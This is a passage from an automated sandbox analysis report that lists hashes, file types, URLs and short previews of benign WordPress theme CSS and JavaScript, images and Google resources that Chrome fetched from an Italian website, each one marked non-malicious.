                                                                                                                                              SHA-256:E96439946C28DFA8FF4A16925E2A1F8BEDF5743D42B04692CAE616B21085BB10
                                                                                                                                              SHA-512:614E653CCA9D8D6934DA1EA9B96CD9F4F4A04E8BA7790C626B01C10E59904E98CD30D8F92049497B7E6A35E466C8EEB713B2988C1F666ACBE6E28CA525B9D4F1
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contact/contact.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Contact Form defaults.====================================================================================================================================================== */....avia_ajax_form{.clear:both;.}...avia_ajax_form fieldset p br{display:none;}..avia_ajax_form label {display:block; visibility: visible; position: relative; } /*dont delete. ie8 needs this separate*/..avia_ajax_form label, .modified_width:before{display:block; visibility: visible; position: relative; margin-bottom: 7px; font-weight: 600;}..#ajaxresponse.hidden{.visibility: visible;.position: static;.display:none;.}...#top .avia_ajax_form .text_input, #top .avia_ajax_form .select, #top .avia_ajax_form .text_area{.width:100%;.margin-bottom:0;.display:inline;.min-width:50px;.padding:13px;.border-radius: 2px;.}....#top .avia_ajax_form .select[multiple] option{paddi
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):4748
                                                                                                                                              Entropy (8bit):4.914294506353523
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:IibjhiRzEOrsOsO/dkGZyUDsy4ooI5r30HqzgBYOcjf1coEGU+MkVmBB7Wo:jbj6YCsRAdfZGnooINdzgBYOcj4FD
                                                                                                                                              MD5:40321E5AC40B598D6C4F38ABCDBBB9E6
                                                                                                                                              SHA1:6383DD1DA684AD9AA3C1693666D15403AFA74707
                                                                                                                                              SHA-256:0E5DA00F8174A2D4006E9BCD98F2C2C2250C07D45E27BF8327C74FF8FCD77E5F
                                                                                                                                              SHA-512:BE4BBBE4F1A0CEF9ECB78E062569179431ADEC32113F48E7B129C926399489E62D05B5659808963C6D7F83C9EC3DD09F99587404FA7EAC3F9979E69602228A94
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tab_section/tab_section.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================..Tab SECTION..====================================================================================================================================================== */...av-inner-tab-title, .av-tab-section-icon, .av-tab-arrow-container, .av-tab-section-image{...width:90px;..}.........av-tab-section-container{...width: 100%;...overflow: hidden;...position: relative;...border: none;..}.....av-tab-section-outer-container{...overflow: hidden;..}.....av-tab-section-inner-container{...display: table;...position: relative;...left:0%;..}.....av-tab-slide-transition .av-tab-section-inner-container{...-webkit-transition: all 0.4s ease-in-out;...transition: ..all 0.4s ease-in-out;..}.....av-layout-tab{...width:100vw;...display: block;...vertical-align: middle;...padding: 50px 0;...border-top-style:solid;...border-top-width:1px;..}.....js_active
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):34179
                                                                                                                                              Entropy (8bit):5.24378984580027
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:tjp/HdQu8hIrNjHunBoaaif2ditPu0I80qyGaagvZ8/8Lo+tn6J5jVt1PauAxlqa:tjp/HdQu8QNjHunqaHmZ8/8Lo+tnkjV8
                                                                                                                                              MD5:DFFA195B546CF1DFD52F2206955EB892
                                                                                                                                              SHA1:A3D48E8F126EB96D12191D76ED71AD2BC8651D59
                                                                                                                                              SHA-256:6C52384C7B0641DD1EAD85D079C22D39BCC6DC5F2537AFB1E6396BB619771A3F
                                                                                                                                              SHA-512:65F3B79475AED8029C10AE3770BCD0FEE4F089A967B86525A6B2C1F8AB6BBE687361C403F9B2C2CFC61322DF9AD8B1D70C0E650FC6CCDC4AD72EB5F65FB38B56
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/plugins/cookie-law-info/legacy/public/js/cookie-law-info-public.js?ver=3.0.5
                                                                                                                                              Preview:CLI_ACCEPT_COOKIE_NAME = (typeof CLI_ACCEPT_COOKIE_NAME !== 'undefined' ? CLI_ACCEPT_COOKIE_NAME : 'viewed_cookie_policy');.CLI_PREFERNCE_COOKIE = (typeof CLI_PREFERNCE_COOKIE !== 'undefined' ? CLI_PREFERNCE_COOKIE : 'CookieLawInfoConsent');.CLI_ACCEPT_COOKIE_EXPIRE = (typeof CLI_ACCEPT_COOKIE_EXPIRE !== 'undefined' ? CLI_ACCEPT_COOKIE_EXPIRE : 365);.CLI_COOKIEBAR_AS_POPUP = (typeof CLI_COOKIEBAR_AS_POPUP !== 'undefined' ? CLI_COOKIEBAR_AS_POPUP : false);.var CLI_Cookie = {..set: function (name, value, days) {...var secure = "";...if (true === Boolean(Cli_Data.secure_cookies)) {....secure = ";secure";...}...if (days) {....var date = new Date();....date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000));....var expires = "; expires=" + date.toGMTString();...} else {....var expires = "";...}...document.cookie = name + "=" + value + secure + expires + "; path=/";...if (days < 1) {....host_name = window.location.hostname;....document.cookie = name + "=" + value + expires + "; path=/; d
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3864
                                                                                                                                              Entropy (8bit):4.962924804401647
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:4LZp5F4bvvjXbOjxlHSWIJtxFGLiCtTR2Kv37glKqiF4OeMdRvINkRYqudc:4dpr2HjMpSKiMZ/vbegCkRMc
                                                                                                                                              MD5:EA40DA6F432E4734DB0A33A43A99BAA5
                                                                                                                                              SHA1:2A70C56824004A64A5D93951816C1BE7B083AF69
                                                                                                                                              SHA-256:2A4D4F70113757B77CEDB59D9DE65C76BE8CA829B7CBB4359489AFD1EDEF4A53
                                                                                                                                              SHA-512:37D6690193C21D6BCABAEB23F5DA7785579ADC237F201938279AA82C02A91CFCCB69C525E64CB3FA77AAE5000C2A92C05A8B0695AF8C0A5D911A297BFA00A64E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:/* . * This file holds javascript functions needed in frontend for the functionallity of the Google Maps widgets and shortcodes. * Handles conditional loading of Google API script.. *. * @author..Christian "Kriesi" Budschedl. * @copyright.Copyright ( c ) Christian Budschedl. * @link..http://kriesi.at. * @link..http://aviathemes.com. * @since..Version 1.0. * @package .AviaFramework. * . */.."use strict";../**. * Avia Google Maps in frontend. */.(function($).{..var objAviaGoogleMaps = null;....var AviaGoogleMaps = function(){......if( 'undefined' == typeof window.av_google_map || 'undefined' == typeof avia_framework_globals )...{....return;...}......if( objAviaGoogleMaps != null )...{....return;...}......objAviaGoogleMaps = this;......this.document = $( document );...this.script_loading = false;...this.script_loaded = false;...this.script_source = avia_framework_globals.gmap_avia_api;...this.maps = {};...this.loading_icon_html = '<div class="ajax_load"><span class="ajax_load_inner"></spa
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=9, manufacturer=FUJIFILM, model=X-S10, xresolution=138, yresolution=146, resolutionunit=2, software=Adobe Photoshop Lightroom Classic 13.4 (Windows), datetime=2024:07:26 14:17:40], baseline, precision 8, 1500x630, components 3
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1064197
                                                                                                                                              Entropy (8bit):7.981761717568579
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:JHxmVQSGoe0Vjwmd91GeIll4Fh2rfEOHCnNHx:JgU0w61E0FheZin
                                                                                                                                              MD5:2A205D069189012204AEE5B882EBF9F0
                                                                                                                                              SHA1:B4357A4004072D8A793689BFC8D4D792E5ACCAF6
                                                                                                                                              SHA-256:DFC1D761C4390200D4138CB00F6B35FACEDEC3E2A2E9BE1F1E0A087CC5151CC9
                                                                                                                                              SHA-512:266B5CD10B5D15954D56510687744445E41EBD26CA785449E22BB51EA4843AD99A87441801A4C7DEF4455BC099E93A55F4BB214705F8AF4E630524FFEC0E6C90
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/uploads/2024/08/Dettaglio-della-sala-interna-1500x630.jpg
                                                                                                                                              Preview:......JFIF..............Exif..II*...............z.......................................(...........1...1.......2...........;...........i...............FUJIFILM..X-S10.................Adobe Photoshop Lightroom Classic 13.4 (Windows)..2024:07:26 14:17:40.YOUGENIO..'........................."...........'....... ...0...................0232............................................................................................$...........,...........4...............................................<.......................D...........L.......................................................................................................................................1.......T...2.......^...3.......~...4...........5.......................G.......2024:07:17 17:12:42.2024:07:17 17:12:42.+02:00..+01:00..+01:00...q'.@B..VLV.@B......d.......d...d...d.......d...d.......d.......1D000530......d.......d.......d.......d...Viltrox.AF 13/1.4 XF..00000404........................................(.....
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (359)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):5464
                                                                                                                                              Entropy (8bit):5.003279115233775
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:loflPTp3QAn5sTX9Ffi+Hso6WHs0yJ1WboU5eH8UslIGum4YF4lB8nlc7SlhYsX:0F+j9J/nyOG3sSg3Fa6naWYA
                                                                                                                                              MD5:912E96BBA6658C45C3F38D7FF4240482
                                                                                                                                              SHA1:A0426B5A44D0B1C36AEF343BC72EAD327B80A531
                                                                                                                                              SHA-256:8E60AA4573BBF0824ABF6595D86B033EB2686F848CF6498523B86C9175211FBD
                                                                                                                                              SHA-512:EDDF37D5B0AC70CB7D1BC5AF1ECBFF9D8F66C325450357344ECAA4A0DED4D3E0FA8C410B77B3FCB71EBF06907166B3676C048FC4AB9D95AAADFE6245BAA4074B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(function($).{.. "use strict";....// -------------------------------------------------------------------------------------------..// Ligthbox activation..// -------------------------------------------------------------------------------------------...$.avia_utilities = $.avia_utilities || {};...$.avia_utilities.av_popup = {....type: ....'image',....mainClass: ...'avia-popup mfp-zoom-in',....tLoading: ...'',....tClose: ...'',....removalDelay: ..300, //delay removal by X to allow out-animation....closeBtnInside: .true,....closeOnContentClick:false,....midClick: ...true,....fixedContentPos: .false, // allows scrolling when lightbox is open but also removes any jumping because of scrollbar removal....iframe: {.... patterns: {.... youtube: {.... index: 'youtube.com/watch', .... id: function(url) { ..... ..... //fetch the id .... var m = url.match(/[\\?\\&]v=([^\\?\\&]+)/), id, params;.... if ( !m ||
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):40642
                                                                                                                                              Entropy (8bit):5.193260399697844
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:1QaewHeUnfqAF1NnKJODRvzub+ysyvyDyvysyvyDy1VfTUaP61VLfL+UIbYm+Sb9:1QaewHeUn7F1NnKJOD5zubBz6+6z6+1V
                                                                                                                                              MD5:A94D1A7B5AE1459791A05B1ECCBD3212
                                                                                                                                              SHA1:FB1A535EB1430E5F6CAED592536E9CA5C1AD2810
                                                                                                                                              SHA-256:D04ACC209BDD31276518D4222608D66CB076DEF6FE8352A6C467730D9DC80136
                                                                                                                                              SHA-512:75EEE0E73CC2118609E4EC264E936D0E6D733241864CE7D9C7A26B349EE12363494BDDC54B83ECB8728C2E2934C4DD8C59FF18C70BF8CBFEE9DC559C29347E4C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/js/shortcodes.js?ver=4.5
                                                                                                                                              Preview:(function($).{.. "use strict";.. $(document).ready(function(). {.. .//global variables that are used on several ocassions. .$.avia_utilities = $.avia_utilities || {};. .. .if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) && 'ontouchstart' in document.documentElement). .{. ..$.avia_utilities.isMobile = true;. .}. .else. .{. ..$.avia_utilities.isMobile = false;. .}. . .//activate fixed bg fallback for mobile. .if($.fn.avia_mobile_fixed)...$('.avia-bg-style-fixed').avia_mobile_fixed();. .. .//activate parallax scrolling for backgrounds.. .if($.fn.avia_parallax)...$('.av-parallax').avia_parallax();. .. .//calculate the browser height and append a css rule to the head...if($.fn.avia_browser_height)...$('.av-minimum-height, .avia-fullscreen-slider, .av-cell-min-height').avia_browser_height();......//calculate the height of each video section...if($.fn.avia_video_section)... $('.a
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):3639
                                                                                                                                              Entropy (8bit):4.9961016718913
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:VBJwgdEnc56Ou98gXorR8LKN8BV8oJ6We7Y5H4HhRy0yW5V5wVFBptwyb+PQAHtn:eBncQOub4HN8BvVe7H0A5g9vOQ+n
                                                                                                                                              MD5:168523E225F4F0DC1D246FA43CAD27E3
                                                                                                                                              SHA1:E49F737A1C513CB64C8B6985BF48A64DDB28CFC5
                                                                                                                                              SHA-256:4BB3A0DFCDC1D59AC8B394BF493506CCF9854C7FD5FB878302801D867FA50727
                                                                                                                                              SHA-512:F3EA6AF1CDF3AEBB0CD008141C28571CF3919FA63FC76D2E0E1C70FE45F271904245B9DC60466A62422565BD2813831239AA06CC37512A8D05753952089F4D34
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/css/avia-snippet-lightbox.css?ver=4.5
                                                                                                                                              Preview:/*--------------------lightbox enhancements---------------*/.../* ...mfp-figure - container that holds image and caption..mfp-bg - black overlay..mfp-preloader - "Loading..." incdicator..*/..mfp-ready .mfp-figure {. opacity: 0;.}..div .mfp-title{..line-height: 1.4em;. font-size: 13px;.}...mfp-title a{ text-decoration: underline; color:#fff;}..mfp-title a:hover{ text-decoration: none; opacity: 0.8;}...mfp-zoom-in .mfp-figure, .mfp-zoom-in .mfp-iframe-holder .mfp-iframe-scaler{. opacity: 0;. -webkit-transition: all 0.3s ease-out;. transition: all 0.3s ease-out;. -webkit-transform: scale(0.95);. -ms-transform: scale(0.95);. transform: scale(0.95);.}..mfp-zoom-in.mfp-bg,..mfp-zoom-in .mfp-preloader {. opacity: 0;. -webkit-transition: all 0.3s ease-out;. transition: all 0.3s ease-out;.}..mfp-zoom-in.mfp-image-loaded .mfp-figure, .mfp-zoom-in.mfp-ready .mfp-iframe-holder .mfp-iframe-scaler{. opacity: 1;. -webkit-transform: scale(1);. -ms-transform: scale(1);. transform:
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):29265
                                                                                                                                              Entropy (8bit):4.701833638094252
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:PxKlxFQFv3wnsrh2gAY14AmFQF/FQFYBRelJJQ7T5bWRJ3:0OsOFO93
                                                                                                                                              MD5:5E72B367CA46E49AD8C0439FB84FC0F8
                                                                                                                                              SHA1:A484EECB67A4543D1D54E665FD280FFDADC7BEFB
                                                                                                                                              SHA-256:E8DEC4D22E464C92DC112F244E569ED19B190E795CF1376B42BDC0E882F9DFDC
                                                                                                                                              SHA-512:7BBE22F1451B365784AE3E34EE82496AB7C77D339A2E207B7DB5E62E6501044F1C58B5095F5BD6DCE893F4324689B8FAAF5A70A9F869342BA4E17E302C5BA208
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/timeline/timeline.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.TIMELINE.====================================================================================================================================================== */...avia-timeline-container{. clear: both;. position: relative;.}..ul.avia-timeline {. margin:0;. padding:0;.}...avia-timeline .av-milestone-icon-wrap{. position: relative;. overflow: hidden;. text-decoration: none;.}...av-milestone-content p:last-child{margin-bottom: 0;}...avia-timeline .milestone_icon{. display: block;. height: 90px;. width: 90px;. line-height: 90px;. font-size: 30px;. text-align: center;. border-radius: 100%;. position: relative;. overflow: hidden;. z-index: 5;. color: #fff;. box-sizing: border-box;.}...avia-timeline .milestone_icon.milestone-icon-hasborder{. padding: 2px;.}...avia-timeline .milest
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):472
                                                                                                                                              Entropy (8bit):4.526594442743127
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:7Riv72bORxfcRQhPRVXorR7MRJmxZRJPlTIR7MRAxZRoTi:7RivgORxfcRQBRVIR7UgxZRVlMR7UAxH
                                                                                                                                              MD5:4EED102095E23D4E6D345081846064B3
                                                                                                                                              SHA1:D8AB605554FB6023B1FBD59AF44959AAAEA6F54C
                                                                                                                                              SHA-256:0276ECC6EB34688965AF8F6B186F9D79F97505A31DD0CC983C3A3C6182CE97FC
                                                                                                                                              SHA-512:2ABE6E0518F2EB4A50F3AA1F444C07EB376CE2933E0A47539A3A41E0FD109B8C658E849CDF0E8E36460C4A16465A930302F7B73466B4139E2252C71AE6351294
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/buttonrow/buttonrow.css?ver=6.0.9
                                                                                                                                              Preview:.avia-buttonrow-wrap > .avia-button{. vertical-align: bottom;.}...avia-buttonrow-left{. text-align: left;.}...avia-buttonrow-right{. text-align: right;.}...avia-buttonrow-center{. text-align: center;.}...avia-buttonrow-right .avia-button:first-child,..avia-buttonrow-left .avia-button:first-child{. margin-left: 0 !important;.}...avia-buttonrow-right .avia-button:last-child,..avia-buttonrow-left .avia-button:last-child {. margin-right: 0 !important;.}.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):4975
                                                                                                                                              Entropy (8bit):4.866935622982883
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:kGABUpZN7wgOavwggXNnvxacX5TlUQX33Yi2AdAklbHUt0nnBvpdNqs4JMyqM7w4:ZABUpnLMpdx+QX3xlHxv/NqX7gugeT
                                                                                                                                              MD5:26E6FB56D44A236661556EF720264B89
                                                                                                                                              SHA1:1944F1DE99A0DA954F01518A8256938409F719BE
                                                                                                                                              SHA-256:A996B0EAC3460F60BDD23A78795A049A70483324F2344D52C704365A1537F2DA
                                                                                                                                              SHA-512:8F096A4DADA198A7AE1F9EE43294DB850AD04C7A9776058B9C126F2C2CBCD658F55FE1AD06B74D76F4414F770C7BA927E15ED14E740D48632D2440A5BAE7748A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/headline_rotator/headline_rotator.js?ver=6.0.9
                                                                                                                                              Preview:(function($).{ .."use strict";....// -------------------------------------------------------------------------------------------..// Avia Text Rotator..// ..// accordion slider script..// -------------------------------------------------------------------------------------------...$.AviaTextRotator = function(options, slider)..{.. this.$win. .= $( window );.. this.$slider .= $( slider );.. this.$inner. .= this.$slider.find('.av-rotator-text');.. this.$slides.= this.$inner.find('.av-rotator-text-single');.. this.$current = this.$slides.eq(0);.. this.open..= 0;.. this.count..= this.$slides.length;.. .. if($.avia_utilities.supported.transition === undefined)...{....$.avia_utilities.supported.transition = $.avia_utilities.supports('transition');...}......this.browserPrefix .= $.avia_utilities.supported.transition;.. this.cssActive ..= this.browserPrefix !== false ? true : false;...this.property..= this.browserPrefix + 'transform',......//this.cssActive
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (2343)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):52916
                                                                                                                                              Entropy (8bit):5.51283890397623
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                              MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                              SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                              SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                              SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 408 x 464, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):18160
                                                                                                                                              Entropy (8bit):7.9507935414647015
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:E6bVK9GIzUQWsZdSawiqS61S3z+Ai3Azy1tL62pW1l0Z86vjNPTN:E6pLIAw2aFqSWS3z+AMZ3k/6vhN
                                                                                                                                              MD5:CC6D2A2EBBDB4CA2D35C2A94F666E56C
                                                                                                                                              SHA1:7B9695FBE92878E751DB650F89A9E9A74279EE10
                                                                                                                                              SHA-256:DEDCB23076BE667A897F4A90BDE0BC80C6A6A58CFE68433BDE59546EB9B74EB5
                                                                                                                                              SHA-512:C9E27F2AAF2AEF1CA88C45EBA39DB2D1C16BAF6886EDDB39FB6723A97320E31697FB53AA8B885B1E445D2F361F91BE0A75B14399D990953D543735A400320E16
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
                                                                                                                                              Preview:.PNG........IHDR..............0|T..F.IDATx..[l\G..Gq[.j..-.......Q.b....:.=.K.6@#KP..U.!(B&!..i......j.B.$>g...%.(.u..H.T.....P5q..gw......H.b;.b.....f...d.....3C.....B..W.Y..o....c..>k..M$x..L....x"...@..>..N.\..}o>'...Z.=.bd.[c..g.w.9~......!....<E......!....QCd...#_..w.....r7.>...U*..?....u...[G.....wG4....+....X...-.R>.,z:.X.X....c.B%60u).._...g.:......._.[...N...t-.)S.J.g<...:.3.Dv.........T..z.#..y_PL......~.nv.k...Z.#...G..^.D..k...jS..m....Ti.J......*..e _..j.,3j..."..4....#.!sSZ@....RS.K..1.~..d.t.Ra.........T7....L..RK4].....h....\...L./....Q...o.Y-...9.EF.].;!.NS.9.e3..!.2....U..T.'.....%c..IC2.....W.S...v?...MP.{[..7&...t.....p.........V.NF5..J....+5=n%..?T..$.....GK...&..-....3:'(.........}...-...zv2...m.T..V.R.d.Z.......a~.G.xz....M..KT...P....7......X..h<}.d..`.NU;>}|^0k#"S1..^.i..3L.r.9|Os.......S..>V.;.xy4..d...*.Z.|f.pKL.....:.........=.~....;z..n...M.D1.OMC2.L..Sc..f..G.Y..L.&..h&.hX.}m..XW....P.zU..&.....d ..+.i.h.u&B......r....
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (314)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):79923
                                                                                                                                              Entropy (8bit):5.101096734419753
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:0ntpxlN02pnPYcID+eunPJvlqdxWL/qtmzeLOFOaxp6KZVK3co4jdvea:IXxlpMDWPJvlqerqtKeSf6S
                                                                                                                                              MD5:C794D8D6A54BC6C470EBDB1F6A831A55
                                                                                                                                              SHA1:D8078D7CFBAC430D9B680210D8C6B84C1B91D293
                                                                                                                                              SHA-256:117CF55F4F945248218E05807FE0288EE15903F1A71D9CDF718413880CCEA653
                                                                                                                                              SHA-512:FDE30A705BBB0496F6022F8A86F9565B56342EB7A609CA45E2F1E3F9B5F630BBE293860474D51988DC1AE4471294CBE3FFCE5D74D912752222AB33839CA12E14
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/css/layout.css?ver=4.5
                                                                                                                                              Preview:/* Table of Content.======================================================================================================================================================..#Site Styles..#Blog Styles..#Page Styles..#Post Formats..#Widget & Sidebar..#Footer & #Socket..#Comment..#CSS Animations..#Media Queries..*/../* ======================================================================================================================================================.#Site Styles.====================================================================================================================================================== */..#header{.position: relative;.z-index: 501; /*(issues/769)*/.width:100%;.background: transparent;.}...#header_main .container, .main_menu ul:first-child > li a{ height:88px; line-height: 88px; }.../* sticky variation*/..html_header_top.html_header_sticky #main{ padding-top:88px; } ..html_header_top.html_header_transparency #header{ position: absolute; }..html_hea
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (65531)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):132723
                                                                                                                                              Entropy (8bit):5.43666102611833
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:fAkJQ7O4N5dTm+syHEt4W3XdQ4Q6PuSr/nUW2i6o:flQ7HTt/sHdQ4Q6PDfUW8o
                                                                                                                                              MD5:CCD7BF8DE7365FD81EA2EB33AB45DDA3
                                                                                                                                              SHA1:3DB90EC7874DFBA8157793816C87D5A6C32951DA
                                                                                                                                              SHA-256:252C3316C20480E520152C7912EA167F491BF6A58AB4337AF09E1619694447D1
                                                                                                                                              SHA-512:CB0EFF228CF13467128E3F2E0BCA011FD7A588C50FA7DD3342F7112738273C67B6FD4F807F43C174904D8FC16BF5E3681C64C6EF7243EE07E3A452FD0EB49982
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                              Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):5506
                                                                                                                                              Entropy (8bit):4.9181132050172085
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:jA2gmAmOqm0HambRzsq0bTg5bxw6CL66qukZ0L1iGioWMODLAsZAvqQQr5DFAv55:QabxjC+6YLZQqQG5RQ5QLZkr
